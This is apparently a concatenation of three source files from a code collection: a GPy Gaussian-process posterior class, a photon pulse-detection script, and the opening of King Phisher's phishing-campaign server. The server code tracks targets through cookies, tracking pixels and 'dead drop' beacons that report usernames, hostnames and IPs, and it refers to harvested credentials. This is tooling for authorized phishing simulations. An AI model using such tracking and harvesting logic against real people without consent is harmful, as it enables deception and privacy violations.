_, _, self._woodbury_chol, _ = pdinv(self._woodbury_inv)
else:
raise ValueError("insufficient information to compute posterior")
return self._woodbury_chol
@property
def woodbury_inv(self):
"""
        The inverse of the Woodbury matrix, which in the Gaussian likelihood case is defined as
$$
(K_{xx} + \Sigma_{xx})^{-1}
\Sigma_{xx} := \texttt{Likelihood.variance / Approximate likelihood covariance}
$$
"""
if self._woodbury_inv is None:
if self._woodbury_chol is not None:
self._woodbury_inv, _ = dpotri(self._woodbury_chol, lower=1)
#self._woodbury_inv, _ = dpotrs(self.woodbury_chol, np.eye(self.woodbury_chol.shape[0]), lower=1)
symmetrify(self._woodbury_inv)
elif self._covariance is not None:
B = np.atleast_3d(self._K) - np.atleast_3d(self._covariance)
self._woodbury_inv = np.empty_like(B)
for i in range(B.shape[-1]):
tmp, _ = dpotrs(self.K_chol, B[:,:,i])
self._woodbury_inv[:,:,i], _ = dpotrs(self.K_chol, tmp.T)
return self._woodbury_inv
@property
def woodbury_vector(self):
"""
        Woodbury vector, which in the Gaussian likelihood case is defined as
$$
(K_{xx} + \Sigma)^{-1}Y
\Sigma := \texttt{Likelihood.variance / Approximate likelihood covariance}
$$
"""
if self._woodbury_vector is None:
self._woodbury_vector, _ = dpotrs(self.K_chol, self.mean - self._prior_mean)
return self._woodbury_vector
@property
def K_chol(self):
"""
Cholesky of the prior covariance K
"""
if self._K_chol is None:
self._K_chol = jitchol(self._K)
return self._K_chol
def _raw_predict(self, kern, Xnew, pred_var, full_cov=False):
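        # Summary of the logic below: standard GP predictive equations,
        # mu_* = K_{*x} v and var_* = K_{**} - K_{*x} W^{-1} K_{x*}, with a separate
        # branch for variational (uncertain) inputs that uses the psi statistics instead.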
woodbury_vector = self.woodbury_vector
woodbury_inv = self.woodbury_inv
if not isinstance(Xnew, VariationalPosterior):
Kx = kern.K(pred_var, Xnew)
mu = np.dot(Kx.T, woodbury_vector)
if len(mu.shape)==1:
mu = mu.reshape(-1,1)
if full_cov:
Kxx = kern.K(Xnew)
if woodbury_inv.ndim == 2:
var = Kxx - np.dot(Kx.T, np.dot(woodbury_inv, Kx))
elif woodbury_inv.ndim == 3: # Missing data
var = np.empty((Kxx.shape[0],Kxx.shape[1],woodbury_inv.shape[2]))
from ...util.linalg import mdot
for i in range(var.shape[2]):
var[:, :, i] = (Kxx - mdot(Kx.T, woodbury_inv[:, :, i], Kx))
var = var
else:
Kxx = kern.Kdiag(Xnew)
if woodbury_inv.ndim == 2:
var = (Kxx - np.sum(np.dot(woodbury_inv.T, Kx) * Kx, 0))[:,None]
elif woodbury_inv.ndim == 3: # Missing data
var = np.empty((Kxx.shape[0],woodbury_inv.shape[2]))
for i in range(var.shape[1]):
var[:, i] = (Kxx - (np.sum(np.dot(woodbury_inv[:, :, i].T, Kx) * Kx, 0)))
var = var
else:
psi0_star = kern.psi0(pred_var, Xnew)
psi1_star = kern.psi1(pred_var, Xnew)
psi2_star = kern.psi2n(pred_var, Xnew)
la = woodbury_vector
mu = np.dot(psi1_star, la) # TODO: dimensions?
N,M,D = psi0_star.shape[0],psi1_star.shape[1], la.shape[1]
if full_cov:
raise NotImplementedError("Full covariance for Sparse GP predicted with uncertain inputs not implemented yet.")
var = np.zeros((Xnew.shape[0], la.shape[1], la.shape[1]))
di = np.diag_indices(la.shape[1])
else:
tmp = psi2_star - psi1_star[:,:,None]*psi1_star[:,None,:]
var = (tmp.reshape(-1,M).dot(la).reshape(N,M,D)*la[None,:,:]).sum(1) + psi0_star[:,None]
if woodbury_inv.ndim==2:
var += -psi2_star.reshape(N,-1).dot(woodbury_inv.flat)[:,None]
else:
var += -psi2_star.reshape(N,-1).dot(woodbury_inv.reshape(-1,D))
var = np.clip(var,1e-15,np.inf)
return mu, var
class PosteriorExact(Posterior):
def _raw_predict(self, kern, Xnew, pred_var, full_cov=False):
Kx = kern.K(pred_var, Xnew)
mu = np.dot(Kx.T, self.woodbury_vector)
if len(mu.shape)==1:
mu = mu.reshape(-1,1)
if full_cov:
Kxx = kern.K(Xnew)
if self._woodbury_chol.ndim == 2:
tmp = dtrtrs(self._woodbury_chol, Kx)[0]
var = Kxx - tdot(tmp.T)
elif self._woodbury_chol.ndim == 3: # Missing data
var = np.empty((Kxx.shape[0],Kxx.shape[1],self._woodbury_chol.shape[2]))
for i in range(var.shape[2]):
tmp = dtrtrs(self._woodbury_chol[:,:,i], Kx)[0]
var[:, :, i] = (Kxx - tdot(tmp.T))
var = var
else:
Kxx = kern.Kdiag(Xnew)
if self._woodbury_chol.ndim == 2:
tmp = dtrtrs(self._woodbury_chol, Kx)[0]
var = (Kxx - np.square(tmp).sum(0))[:,None]
elif self._woodbury_chol.ndim == 3: # Missing data
var = np.empty((Kxx.shape[0],self._woodbury_chol.shape[2]))
for i in range(var.shape[1]):
tmp = dtrtrs(self._woodbury_chol[:,:,i], Kx)[0]
var[:, i] = (Kxx - np.square(tmp).sum(0))
var = var
return mu, var
|
avehtari/GPy
|
GPy/inference/latent_function_inference/posterior.py
|
Python
|
bsd-3-clause
| 10,849
|
[
"Gaussian"
] |
43e7b14b2bd67af2124f83bdbba7cc8acf573601534d6c8bdaea23c36fe59ecf
|
from matplotlib import rcParams, rc
import numpy as np
import sys
from fitFunctions import gaussian
import scipy.interpolate
import scipy.signal
from baselineIIR import IirFilter
import pickle
# common setup for matplotlib
params = {'savefig.dpi': 300, # save figures to 300 dpi
'axes.labelsize': 14,
'text.fontsize': 14,
'legend.fontsize': 14,
'xtick.labelsize': 14,
'ytick.major.pad': 6,
'xtick.major.pad': 6,
'ytick.labelsize': 14}
# use of Sans Serif also in math mode
rc('text.latex', preamble='\usepackage{sfmath}')
rcParams.update(params)
import matplotlib.pyplot as plt
import numpy as np
import os
import struct
def calcThreshold(phase,nSigma=2.5,nSamples=5000):
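    # Summary of the logic below: build an empirical CDF of the first nSamples phase
    # values, read off the median and (approximately) the 5th percentile, and return
    # median - nSigma * |median - 5th percentile| as the trigger threshold.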
n,bins= np.histogram(phase[:nSamples],bins=100)
n = np.array(n,dtype='float32')/np.sum(n)
tot = np.zeros(len(bins))
for i in xrange(len(bins)):
tot[i] = np.sum(n[:i])
med = bins[np.abs(tot-0.5).argmin()]
thresh = bins[np.abs(tot-0.05).argmin()]
threshold = med-nSigma*abs(med-thresh)
return threshold
def velocityTrigger(data,nSigmaTrig=5.,deadtime=10,bNegativePulses=True):
#deadtime in ticks (us)
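    # Summary of the logic below: the trace is flipped to positive pulses if requested,
    # samples exceeding median(diff(data)) + nSigmaTrig * std(diff(data)) are flagged as
    # triggers, and a deadtime window then drops any trigger within `deadtime` samples
    # of a previous one.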
if bNegativePulses:
data = -np.array(data) #flip to be positve pulses
else:
data = np.array(data)
derivative = np.diff(data)
med = np.median(derivative)
sdev = np.std(derivative)
trigMask = data > (med + sdev*nSigmaTrig)
if np.sum(trigMask) > 0:
peakIndices = np.where(trigMask)[0] #we want the point after the high derivative
i = 0
p = peakIndices[i]
while p < peakIndices[-1]:
peakIndices = peakIndices[np.logical_or(peakIndices-p > deadtime , peakIndices-p <= 0)]#apply deadtime
i+=1
if i < len(peakIndices):
p = peakIndices[i]
else:
p = peakIndices[-1]
else:
return {'peakIndices':np.array([]),'peakHeights':np.array([])}
if bNegativePulses:
peakHeights = -data[peakIndices] #flip back to negative pulses
else:
peakHeights = data[peakIndices]
return {'peakIndices':peakIndices,'peakHeights':peakHeights}
def sigmaTrigger(data,nSigmaTrig=7.,deadtime=10):
#deadtime in ticks (us)
data = np.array(data)
med = np.median(data)
trigMask = data > (med + np.std(data)*nSigmaTrig)
if np.sum(trigMask) > 0:
peakIndices = np.where(trigMask)[0]
i = 0
p = peakIndices[i]
while p < peakIndices[-1]:
peakIndices = peakIndices[np.logical_or(peakIndices-p > deadtime , peakIndices-p <= 0)]#apply deadtime
i+=1
if i < len(peakIndices):
p = peakIndices[i]
else:
p = peakIndices[-1]
else:
return {'peakIndices':np.array([]),'peakHeights':np.array([])}
peakHeights = data[peakIndices]
return {'peakIndices':peakIndices,'peakHeights':peakHeights}
def detectPulses(data,threshold=None,nSigmaThreshold=None,deadtime=10,nNegDerivChecks=10,negDerivLenience=1,bNegativePulses = True):
#deadtime in ticks (us)
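    # Summary of the logic below: a sample counts as a peak when (1) the (negative-going)
    # trace drops below `threshold`, (2) most of the preceding nNegDerivChecks derivatives
    # are non-positive (allowing up to negDerivLenience exceptions), and (3) the next two
    # derivatives are positive; a deadtime window then removes peaks within `deadtime`
    # samples of an earlier one.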
if bNegativePulses:
data = np.array(data)
else:
data = -np.array(data) #flip to negative pulses
if threshold is None:
threshold = calcThreshold(data,nSigma=nSigmaThreshold)
derivative = np.diff(data)
peakHeights = []
t = 0
negDeriv = derivative <= 0
posDeriv = np.logical_not(negDeriv)
triggerBooleans = data[nNegDerivChecks:-2] < threshold
negDerivChecksSum = np.zeros(len(negDeriv[0:-nNegDerivChecks-1]))
for i in range(nNegDerivChecks):
negDerivChecksSum += negDeriv[i:i-nNegDerivChecks-1]
peakCondition0 = negDerivChecksSum >= nNegDerivChecks-negDerivLenience
peakCondition1 = np.logical_and(posDeriv[nNegDerivChecks:-1],posDeriv[nNegDerivChecks+1:])
peakCondition01 = np.logical_and(peakCondition0,peakCondition1)
peakBooleans = np.logical_and(triggerBooleans,peakCondition01)
try:
peakIndices = np.where(peakBooleans)[0]+nNegDerivChecks
i = 0
p = peakIndices[i]
while p < peakIndices[-1]:
peakIndices = peakIndices[np.logical_or(peakIndices-p > deadtime , peakIndices-p <= 0)]#apply deadtime
i+=1
if i < len(peakIndices):
p = peakIndices[i]
else:
p = peakIndices[-1]
except IndexError:
return {'peakIndices':np.array([]),'peakHeights':np.array([])}
if bNegativePulses:
peakHeights = data[peakIndices]
else:
peakHeights = -data[peakIndices] #flip back to positive sign
return {'peakIndices':peakIndices,'peakHeights':peakHeights}
if __name__=='__main__':
#identify which pixel and files we want
# roachNum = 4
# pixelNum = 102
# secs=50
# date = '20121204'
# label='30tap_slowBase'
roachNum = 0
pixelNum = 0
date = '20160301'
label='sim_high'
subBaseLabel = 'SubBase'
rootFolder = '/Scratch/filterData/'
cps=200 #I don't really know. let's check
folder = os.path.join(rootFolder,date)
bFiltered = False
#np.savez('/Scratch/dataProcessing/filterTests/filteredData_{}_r{}p{}_{}.npz'.format(date,roachNum,pixelNum,label),rawdata=rawdata,wienerFilterCoeffs=wienerFilterCoeffs,template=template,noiseSpectrum=noiseSpectrum,templateFilteredData=templateFilteredData,wienerFilteredData=wienerFilteredData)
filteredDict = np.load('/Scratch/dataProcessing/filterTests/filteredData{}_{}_r{}p{}_{}.npz'.format(subBaseLabel,date,roachNum,pixelNum,label))
filterTypes = ['unity','template','matched','super matched','wiener']
filteredDataKeys = ['rawdata','templateFilteredData','matchedFilteredData','superMatchedFilteredData','wienerFilteredData']
filterColors = ['gray','black','blue','cyan','red']
bSubtractBaselines = False
if bSubtractBaselines:
#create a highpass filter, then apply it to the data to take out the low frequency baseline
sampleRate=1e6 # samples per second
criticalFreq = 20 #Hz
f=2*np.sin(np.pi*criticalFreq/sampleRate)
Q=.7
q=1./Q
hpSvf = IirFilter(sampleFreqHz=sampleRate,numCoeffs=np.array([1,-2,1]),denomCoeffs=np.array([1+f**2, f*q-2,1-f*q]))
data = hpSvf.filterData(rawdata)
#data = scipy.signal.lfilter(filter,1,rawdata)
nSigmaTrig = 6.
deadtime = 10.
trigDict = {}
for filterType,dataKey in zip(filterTypes,filteredDataKeys):
print filterType
if filterType == 'unity':
trigDict[filterType] = velocityTrigger(filteredDict[dataKey].real,deadtime=deadtime,bNegativePulses=False,nSigmaTrig=11.)
elif filterType == 'matched' or filterType == 'super matched':
trigDict[filterType] = detectPulses(filteredDict[dataKey].real,deadtime=deadtime,nSigmaThreshold=5.,bNegativePulses=False,negDerivLenience=3)
else:
trigDict[filterType] = detectPulses(filteredDict[dataKey].real,deadtime=deadtime,nSigmaThreshold=5.,bNegativePulses=False)
print '{}: {} peaks detected'.format(filterType,len(trigDict[filterType]['peakIndices']))
nBins = 300
bPlotPeakHist = True
if bPlotPeakHist:
figHist,axHist = plt.subplots(1,1)
for filterType,filterColor in zip(filterTypes,filterColors):
peakHist,peakHistBins = np.histogram(trigDict[filterType]['peakHeights'],bins=nBins,density=True)
axHist.plot(peakHistBins[0:-1],peakHist,color=filterColor,label=filterType)
axHist.legend(loc='best')
print 'saving'
np.savez('/Scratch/dataProcessing/filterTests/filteredTriggers{}_{}_r{}p{}_{}.npz'.format(subBaseLabel,date,roachNum,pixelNum,label),
unityIndices=trigDict['unity']['peakIndices'],
unityPeaks=trigDict['unity']['peakHeights'],
templateIndices=trigDict['template']['peakIndices'],
templatePeaks=trigDict['template']['peakHeights'],
matchedIndices=trigDict['matched']['peakIndices'],
matchedPeaks=trigDict['matched']['peakHeights'],
superMatchedIndices=trigDict['super matched']['peakIndices'],
superMatchedPeaks=trigDict['super matched']['peakHeights'],
wienerIndices=trigDict['wiener']['peakIndices'],
wienerPeaks=trigDict['wiener']['peakHeights'])
bPlotPeaks = True
if bPlotPeaks:
fig,ax = plt.subplots(1,1)
endIdx = 100000
for (filterType,dataKey),filterColor in zip(zip(filterTypes,filteredDataKeys),filterColors):
ax.plot(filteredDict[dataKey][0:endIdx],'.-',color=filterColor,label=filterType)
endPeakIdx = np.searchsorted(trigDict[filterType]['peakIndices'],endIdx)
ax.plot(trigDict[filterType]['peakIndices'][0:endPeakIdx],trigDict[filterType]['peakHeights'][0:endPeakIdx],'gd')
ax.set_xlabel('time (us)')
ax.set_ylabel('phase (${}^{\circ}$)')
#ax.set_xlim([5000,15000])
ax.legend(loc='best')
#ax.set_title('detected peaks and baseline for ~%d cps, pixel /r%d/p%d'%(cps,roachNum,pixelNum))
#ax.legend(loc='lower right')
plt.show()
|
bmazin/SDR
|
Projects/SuperMatchedFilters/photonTriggers.py
|
Python
|
gpl-2.0
| 9,211
|
[
"Gaussian"
] |
47e72fd6c99f826238a1b7add2597359c9ae91caa32ea7ec779073cc4b6bbf9e
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/server.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import base64
import binascii
import ipaddress
import json
import logging
import os
import shutil
import socket
import threading
from king_phisher import errors
from king_phisher import find
from king_phisher import geoip
from king_phisher import sms
from king_phisher import templates
from king_phisher import utilities
from king_phisher import xor
from king_phisher.server import authenticator
from king_phisher.server import pages
from king_phisher.server import rest_api
from king_phisher.server import server_rpc
from king_phisher.server.database import manager as db_manager
from king_phisher.server.database import models as db_models
from king_phisher.third_party.AdvancedHTTPServer import *
import jinja2
from smoke_zephyr import job
make_uid = lambda: utilities.random_string(24)
def build_king_phisher_server(config, ServerClass=None, HandlerClass=None):
"""
Build a server from a provided configuration instance. If *ServerClass* or
*HandlerClass* is specified, then the object must inherit from the
corresponding KingPhisherServer base class.
:param config: Configuration to retrieve settings from.
:type config: :py:class:`smoke_zephyr.configuration.Configuration`
:param ServerClass: Alternative server class to use.
:type ServerClass: :py:class:`.KingPhisherServer`
:param HandlerClass: Alternative handler class to use.
:type HandlerClass: :py:class:`.KingPhisherRequestHandler`
:return: A configured server instance.
:rtype: :py:class:`.KingPhisherServer`
"""
logger = logging.getLogger('KingPhisher.Server.build')
ServerClass = (ServerClass or KingPhisherServer)
HandlerClass = (HandlerClass or KingPhisherRequestHandler)
# set config defaults
if not config.has_option('server.secret_id'):
config.set('server.secret_id', make_uid())
address = (config.get('server.address.host'), config.get('server.address.port'))
ssl_certfile = None
ssl_keyfile = None
if config.has_option('server.ssl_cert'):
ssl_certfile = config.get('server.ssl_cert')
ssl_keyfile = config.get_if_exists('server.ssl_key')
try:
server = ServerClass(config, HandlerClass, address=address, ssl_certfile=ssl_certfile, ssl_keyfile=ssl_keyfile)
except socket.error as error:
error_number, error_message = error.args
if error_number == 98:
logger.critical("failed to bind server to address {0}:{1} (socket error #98)".format(*address))
raise errors.KingPhisherError("socket error #{0} ({1})".format((error_number or 'NOT-SET'), error_message))
if config.has_option('server.server_header'):
server.server_version = config.get('server.server_header')
if not config.get_if_exists('server.rest_api.token'):
config.set('server.rest_api.token', rest_api.generate_token())
if config.get('server.rest_api.enabled'):
logger.info('rest api initialized with token: ' + config.get('server.rest_api.token'))
return server
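# Illustrative usage sketch (hypothetical names, not taken from this module): the
# returned server is typically built from a smoke_zephyr Configuration and then run,
# for example:
#   config = configuration.Configuration('server_config.yml')
#   server = build_king_phisher_server(config)
#   server.serve_forever()
# The config file name and the serve_forever() call are assumptions for illustration.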
class KingPhisherRequestHandler(server_rpc.KingPhisherRequestHandlerRPC, AdvancedHTTPServerRequestHandler):
def __init__(self, *args, **kwargs):
# this is for attribute documentation
self.config = None
"""A reference to the main server instance :py:attr:`.KingPhisherServer.config`."""
self.path = None
"""The resource path of the current HTTP request."""
super(KingPhisherRequestHandler, self).__init__(*args, **kwargs)
def install_handlers(self):
self.logger = logging.getLogger('KingPhisher.Server.RequestHandler')
super(KingPhisherRequestHandler, self).install_handlers()
self.config = self.server.config
regex_prefix = '^'
if self.config.get('server.vhost_directories'):
regex_prefix += '[\w\.\-]+\/'
for path, handler in self.handler_map.items():
if path.startswith(rest_api.REST_API_BASE):
del self.handler_map[path]
self.handler_map[regex_prefix + path] = handler
self.handler_map[regex_prefix + 'kpdd$'] = self.handle_deaddrop_visit
self.handler_map[regex_prefix + 'kp\\.js$'] = self.handle_javascript_hook
tracking_image = self.config.get('server.tracking_image')
tracking_image = tracking_image.replace('.', '\\.')
self.handler_map[regex_prefix + tracking_image + '$'] = self.handle_email_opened
def issue_alert(self, alert_text, campaign_id):
"""
Send an SMS alert. If no *campaign_id* is specified all users
with registered SMS information will receive the alert otherwise
only users subscribed to the campaign specified.
:param str alert_text: The message to send to subscribers.
:param int campaign_id: The campaign subscribers to send the alert to.
"""
session = db_manager.Session()
campaign = db_manager.get_row_by_id(session, db_models.Campaign, campaign_id)
if '{campaign_name}' in alert_text:
alert_text = alert_text.format(campaign_name=campaign.name)
for subscription in campaign.alert_subscriptions:
user = subscription.user
carrier = user.phone_carrier
number = user.phone_number
if carrier == None or number == None:
self.server.logger.warning("skipping alert because user {0} has missing information".format(user.id))
continue
self.server.logger.debug("sending alert SMS message to {0} ({1})".format(number, carrier))
sms.send_sms(alert_text, number, carrier, 'donotreply@kingphisher.local')
session.close()
def adjust_path(self):
"""Adjust the :py:attr:`~.KingPhisherRequestHandler.path` attribute based on multiple factors."""
self.request_path = self.path.split('?', 1)[0]
if not self.config.get('server.vhost_directories'):
return
if not self.vhost:
raise errors.KingPhisherAbortRequestError()
if self.vhost in ['localhost', '127.0.0.1'] and self.client_address[0] != '127.0.0.1':
raise errors.KingPhisherAbortRequestError()
self.path = '/' + self.vhost + self.path
def _do_http_method(self, *args, **kwargs):
if self.command != 'RPC':
self.adjust_path()
http_method_handler = getattr(super(KingPhisherRequestHandler, self), 'do_' + self.command)
self.server.throttle_semaphore.acquire()
try:
http_method_handler(*args, **kwargs)
except errors.KingPhisherAbortRequestError as error:
if not error.response_sent:
self.respond_not_found()
finally:
self.server.throttle_semaphore.release()
do_GET = _do_http_method
do_HEAD = _do_http_method
do_POST = _do_http_method
do_RPC = _do_http_method
def get_template_vars_client(self):
"""
Build a dictionary of variables for a client with an associated
campaign.
:return: The client specific template variables.
:rtype: dict
"""
client_vars = {
'address': self.get_client_ip()
}
if not self.message_id:
return client_vars
visit_count = 0
result = None
if self.message_id == self.config.get('server.secret_id'):
result = ['aliddle@wonderland.com', 'Wonderland Inc.', 'Alice', 'Liddle', 0]
elif self.message_id:
session = db_manager.Session()
message = db_manager.get_row_by_id(session, db_models.Message, self.message_id)
if message:
visit_count = len(message.visits)
result = [message.target_email, message.company_name, message.first_name, message.last_name, message.trained]
session.close()
if not result:
return client_vars
client_vars['email_address'] = result[0]
client_vars['company_name'] = result[1]
client_vars['first_name'] = result[2]
client_vars['last_name'] = result[3]
client_vars['is_trained'] = result[4]
client_vars['message_id'] = self.message_id
client_vars['visit_count'] = visit_count
if self.visit_id:
client_vars['visit_id'] = self.visit_id
else:
# if the visit_id is not set then this is a new visit so increment the count preemptively
client_vars['visit_count'] += 1
return client_vars
def custom_authentication(self, username, password):
return self.server.forked_authenticator.authenticate(username, password)
def check_authorization(self):
# don't require authentication for non-RPC requests
if self.command != 'RPC':
return True
if ipaddress.ip_address(self.client_address[0]).is_loopback:
return super(KingPhisherRequestHandler, self).check_authorization()
return False
@property
def campaign_id(self):
"""
The campaign id that is associated with the current request's
visitor. This is retrieved by looking up the
:py:attr:`~.KingPhisherRequestHandler.message_id` value in the
database. If no campaign is associated, this value is None.
"""
if hasattr(self, '_campaign_id'):
return self._campaign_id
self._campaign_id = None
if self.message_id and self.message_id != self.config.get('server.secret_id'):
session = db_manager.Session()
message = db_manager.get_row_by_id(session, db_models.Message, self.message_id)
if message:
self._campaign_id = message.campaign_id
session.close()
return self._campaign_id
@property
def message_id(self):
"""
The message id that is associated with the current request's
visitor. This is retrieved by looking at an 'id' parameter in the
query and then by checking the
:py:attr:`~.KingPhisherRequestHandler.visit_id` value in the
database. If no message id is associated, this value is None. The
resulting value will be either a confirmed valid value, or the value
of the configurations server.secret_id for testing purposes.
"""
if hasattr(self, '_message_id'):
return self._message_id
self._message_id = None
msg_id = self.get_query('id')
if msg_id == self.config.get('server.secret_id'):
self._message_id = msg_id
return self._message_id
session = db_manager.Session()
if msg_id and db_manager.get_row_by_id(session, db_models.Message, msg_id):
self._message_id = msg_id
elif self.visit_id:
visit = db_manager.get_row_by_id(session, db_models.Visit, self.visit_id)
self._message_id = visit.message_id
session.close()
return self._message_id
@property
def visit_id(self):
"""
The visit id that is associated with the current request's
visitor. This is retrieved by looking for the King Phisher cookie.
If no cookie is set, this value is None.
"""
if hasattr(self, '_visit_id'):
return self._visit_id
self._visit_id = None
kp_cookie_name = self.config.get('server.cookie_name')
if kp_cookie_name in self.cookies:
value = self.cookies[kp_cookie_name].value
session = db_manager.Session()
if db_manager.get_row_by_id(session, db_models.Visit, value):
self._visit_id = value
session.close()
return self._visit_id
@property
def vhost(self):
"""The value of the Host HTTP header."""
return self.headers.get('host', '').split(':')[0]
def get_client_ip(self):
"""
Intelligently get the IP address of the HTTP client, optionally
accounting for proxies that may be in use.
:return: The clients IP address
:rtype: str
"""
address = self.client_address[0]
cookie_name = self.config.get_if_exists('server.client_ip_cookie')
if not cookie_name:
return address
cookie_value = self.headers.get(cookie_name, '')
if not cookie_value:
return address
if cookie_value.startswith('['):
# cookie_value looks like an IPv6 address
cookie_value = cookie_value.split(']:', 1)[0]
else:
			# treat cookie_value as an IPv4 address
cookie_value = cookie_value.split(':', 1)[0]
if utilities.is_valid_ip_address(cookie_value):
address = cookie_value
return address
def respond_file(self, file_path, attachment=False, query={}):
self._respond_file_check_id()
file_path = os.path.abspath(file_path)
mime_type = self.guess_mime_type(file_path)
if attachment or (mime_type != 'text/html' and mime_type != 'text/plain'):
self._respond_file_raw(file_path, attachment)
return
try:
template = self.server.template_env.get_template(os.path.relpath(file_path, self.server.serve_files_root))
except jinja2.exceptions.TemplateSyntaxError as error:
self.server.logger.error("jinja2 syntax error in template {0}:{1} {2}".format(error.filename, error.lineno, error.message))
raise errors.KingPhisherAbortRequestError()
except jinja2.exceptions.TemplateError:
raise errors.KingPhisherAbortRequestError()
template_vars = {
'client': self.get_template_vars_client(),
'request': {
'command': self.command,
'cookies': dict((c[0], c[1].value) for c in self.cookies.items()),
'parameters': dict(zip(self.query_data.keys(), map(self.get_query, self.query_data.keys()))),
'user_agent': self.headers.get('user-agent')
},
'server': {
'hostname': self.vhost,
'address': self.connection.getsockname()[0]
}
}
template_vars.update(self.server.template_env.standard_variables)
try:
template_data = template.render(template_vars)
except (TypeError, jinja2.TemplateError) as error:
self.server.logger.error("jinja2 template {0} render failed: {1} {2}".format(template.filename, error.__class__.__name__, error.message))
raise errors.KingPhisherAbortRequestError()
fs = os.stat(template.filename)
if mime_type.startswith('text'):
mime_type = mime_type + '; charset=utf-8'
self.send_response(200)
self.send_header('Content-Type', mime_type)
self.send_header('Content-Length', str(len(template_data)))
self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
try:
self.handle_page_visit()
except Exception as error:
self.server.logger.error('handle_page_visit raised error: {0}.{1}'.format(error.__class__.__module__, error.__class__.__name__), exc_info=True)
self.end_headers()
self.wfile.write(template_data.encode('utf-8', 'ignore'))
return
def _respond_file_raw(self, file_path, attachment):
try:
file_obj = open(file_path, 'rb')
except IOError:
raise errors.KingPhisherAbortRequestError()
fs = os.fstat(file_obj.fileno())
self.send_response(200)
self.send_header('Content-Type', self.guess_mime_type(file_path))
self.send_header('Content-Length', str(fs[6]))
if attachment:
file_name = os.path.basename(file_path)
self.send_header('Content-Disposition', 'attachment; filename=' + file_name)
self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
self.end_headers()
shutil.copyfileobj(file_obj, self.wfile)
file_obj.close()
return
def _respond_file_check_id(self):
if not self.config.get('server.require_id'):
return
if self.message_id == self.config.get('server.secret_id'):
return
# a valid campaign_id requires a valid message_id
if not self.campaign_id:
self.server.logger.warning('denying request due to lack of a valid id')
raise errors.KingPhisherAbortRequestError()
session = db_manager.Session()
campaign = db_manager.get_row_by_id(session, db_models.Campaign, self.campaign_id)
query = session.query(db_models.LandingPage)
query = query.filter_by(campaign_id=self.campaign_id, hostname=self.vhost)
if query.count() == 0:
self.server.logger.warning('denying request with not found due to invalid hostname')
session.close()
raise errors.KingPhisherAbortRequestError()
if campaign.reject_after_credentials and self.visit_id == None:
query = session.query(db_models.Credential)
query = query.filter_by(message_id=self.message_id)
if query.count():
self.server.logger.warning('denying request because credentials were already harvested')
session.close()
raise errors.KingPhisherAbortRequestError()
session.close()
return
def respond_not_found(self):
self.send_response(404, 'Resource Not Found')
self.send_header('Content-Type', 'text/html')
self.end_headers()
page_404 = find.find_data_file('error_404.html')
if page_404:
with open(page_404, 'rb') as page_404:
shutil.copyfileobj(page_404, self.wfile)
else:
self.wfile.write('Resource Not Found\n')
return
def respond_redirect(self, location='/'):
location = location.lstrip('/')
if self.config.get('server.vhost_directories') and location.startswith(self.vhost):
location = location[len(self.vhost):]
if not location.startswith('/'):
location = '/' + location
super(KingPhisherRequestHandler, self).respond_redirect(location)
def handle_deaddrop_visit(self, query):
self.send_response(200)
self.end_headers()
data = self.get_query('token')
if not data:
self.logger.warning('dead drop request received with no \'token\' parameter')
return
try:
			data = base64.b64decode(data)
except binascii.Error:
self.logger.error('dead drop request received with invalid \'token\' data')
return
data = xor.xor_decode(data)
try:
data = json.loads(data)
except ValueError:
self.logger.error('dead drop request received with invalid \'token\' data')
return
session = db_manager.Session()
deployment = db_manager.get_row_by_id(session, db_models.DeaddropDeployment, data.get('deaddrop_id'))
if not deployment:
session.close()
self.logger.error('dead drop request received for an unknown campaign')
return
local_username = data.get('local_username')
local_hostname = data.get('local_hostname')
if local_username == None or local_hostname == None:
session.close()
self.logger.error('dead drop request received with missing data')
return
local_ip_addresses = data.get('local_ip_addresses')
if isinstance(local_ip_addresses, (list, tuple)):
local_ip_addresses = ' '.join(local_ip_addresses)
query = session.query(db_models.DeaddropConnection)
query = query.filter_by(id=deployment.id, local_username=local_username, local_hostname=local_hostname)
connection = query.first()
if connection:
connection.visit_count += 1
else:
			connection = db_models.DeaddropConnection(campaign_id=deployment.campaign_id, deployment_id=deployment.id)
			connection.visitor_ip = self.get_client_ip()
connection.local_username = local_username
connection.local_hostname = local_hostname
connection.local_ip_addresses = local_ip_addresses
session.add(connection)
session.commit()
query = session.query(db_models.DeaddropConnection)
query = query.filter_by(campaign_id=deployment.campaign_id)
visit_count = query.count()
session.close()
if visit_count > 0 and ((visit_count in [1, 3, 5]) or ((visit_count % 10) == 0)):
alert_text = "{0} deaddrop connections reached for campaign: {{campaign_name}}".format(visit_count)
			self.server.job_manager.job_run(self.issue_alert, (alert_text, deployment.campaign_id))
return
def handle_email_opened(self, query):
# image size: 43 Bytes
img_data = '47494638396101000100800100000000ffffff21f90401000001002c00000000'
img_data += '010001000002024c01003b'
img_data = binascii.a2b_hex(img_data)
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.send_header('Content-Length', str(len(img_data)))
self.end_headers()
self.wfile.write(img_data)
msg_id = self.get_query('id')
if not msg_id:
return
